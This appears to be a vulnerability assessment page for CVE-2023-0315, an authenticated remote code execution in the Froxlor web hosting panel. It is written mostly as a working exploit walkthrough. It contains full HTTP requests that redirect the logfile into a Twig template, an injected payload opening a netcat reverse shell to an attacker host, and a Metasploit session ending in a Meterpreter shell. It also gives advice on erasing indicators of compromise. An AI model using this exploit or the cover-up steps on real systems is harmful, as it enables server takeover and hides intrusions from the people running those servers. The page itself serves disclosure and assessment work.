Attacker Value
Moderate
CVE-2023-0315
CVE-2023-0315
(Last updated October 08, 2023) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Metasploit Module
Description
Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.
Add Assessment
1
Technical Analysis
Attacker Value and Exploitability
Froxlor is a an open source web hosting control panel, with around 20,000 live instances listening on the internet at the time of writing. In versions <= 2.0.6 there exists an authenticated RCE vulnerability. Exploitation is trivia given credentials to the Froxlor application, as PoC details and a metasploit module are readily available, giving this vulnerability a moderate Attacker Value & Exploitability rating.
Vulnerability Details
Exploiting this vuln requires a few simple steps:
- As an authenticated user, change the logfile path to:
/var/www/html/froxlor/templates/Froxlor/footer.html.twigthis can be done by sending the following POST request to the server:
POST /froxlor/admin_settings.php?page=overview&part=logging HTTP/1.1 Host: 172.16.199.140 Content-Length: 1125 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.16.199.140 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8L3nWBWoG1AKOVm User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.199.140/froxlor/admin_settings.php?page=overview&part=logging Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=admjpmobmubbadpq6lpun95b8q Connection: close ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_enabled" 0 ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_enabled" 1 ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_severity" 2 ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_logtypes[]" file ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_logfile" /var/www/html/froxlor/logs/froxlor.log ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="logger_log_cron" 0 ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="csrf_token" cce9438c7954b65c86960649e5b95e8fc1157c61 ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="page" overview ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="action" ------WebKitFormBoundaryt8L3nWBWoG1AKOVm Content-Disposition: form-data; name="send" send ------WebKitFormBoundaryt8L3nWBWoG1AKOVm--
(Twig is a template engine for the PHP programming language. The file mentioned above, /footer.html.twig is the footer for the homepage of the Froxlor application and lucky for the attacker, it gets executed every time the homepage is refreshed.)
- Next inject a payload into the new logfile with the following format:
{{['COMMAND']|filter('exec')}}1this will ensure the command will be executed when the.twigfile is loaded. This can be achieved by changing the ‘theme’ of the froxlor application as an authenticated user with the following post request:
POST /froxlor/admin_index.php HTTP/1.1 Host: 172.16.199.140 Content-Length: 101 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.16.199.140 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.199.140/froxlor/admin_index.php?page=change_theme Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt Connection: close theme=%7b%7b%5b%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%37%32%2e%31%36%2e%31%39%39%2e%31%20%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66%27%5d%7c%66%69%6c%74%65%72%28%27%65%78%65%63%27%29%7d%7d&csrf_token=caeb932a7ea81b18d82116300b79be5d8a008a10&page=change_theme&send=send&dosave=
In the above request, theme has been URL encoded and set to: {{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.199.1 4444 >/tmp/f']|filter('exec')}}
- Now, with a listener setup, all the attacker has to do send the following GET request to trigger the payload (or reload the froxlor application in their browser) and they will have a shell running in the context of the application (which if running on Ubuntu in a default configuation would be user
www-data):
GET /froxlor/admin_index.php? HTTP/1.1 Host: 172.16.199.140 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.16.199.140/froxlor/admin_index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt Connection: close
IOCs
As soon as the logfile path is changed to /footer.html.twig or any other .twig file the attacker chooses to target, the froxlor application begins writing log lines to that file. In the case of /footer.html.twig users will start to see log lines appearing in the at the bottom (or in the footer element) of the application like so:
Once the attacker has injected their payload, the application will hang, as the payload is executed and the application runs off to connect to the attacker. Now, these IOCs can be covered up if the attacker changes the log file path back to it’s original setting and then erases the payload and additional log lines from footer.html.twig. The metasploit module covers up these IOCs, so if you plan on exploiting this vuln, be sure to make use of it.
Metasploit Module Demonstration:
msf6 > use exploit/linux/http/froxlor_log_path_rce [*] Using exploit/linux/http/froxlor_log_path_rce msf6 exploit(linux/http/froxlor_log_path_rce) > set rhosts 172.16.199.140 rhosts => 172.16.199.140 msf6 exploit(linux/http/froxlor_log_path_rce) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(linux/http/froxlor_log_path_rce) > set lport 9191 lport => 9191 msf6 exploit(linux/http/froxlor_log_path_rce) > set username admin username => admin msf6 exploit(linux/http/froxlor_log_path_rce) > set password notpassword password => notpassword msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit [*] Reloading module... [*] Started reverse TCP handler on 172.16.199.1:9191 [*] Running automatic check ("set AutoCheck false" to disable) [+] Successful login [+] The target appears to be vulnerable. Vulnerable version found: 2.0.3 [+] Successfully Logged in! [+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621 [+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig [*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs [+] Injected payload sucessfully [*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log [*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs [*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3045348 bytes) to 172.16.199.140 [*] Cleaning up... [*] Deleting tampered footer.html.twig file [*] Rewriting clean footer.html.twig file [*] Meterpreter session 3 opened (172.16.199.1:9191 -> 172.16.199.140:50398) at 2023-02-13 18:20:02 -0500 [*] Command Stager progress - 100.00% done (117/117 bytes) [*] Server stopped. meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : 172.16.199.140 OS : Ubuntu 20.04 (Linux 5.15.0-58-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter >
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
General Information
Vendors
- froxlor
Products
- froxlor
Metasploit Modules
References
Exploit
The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from:
nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
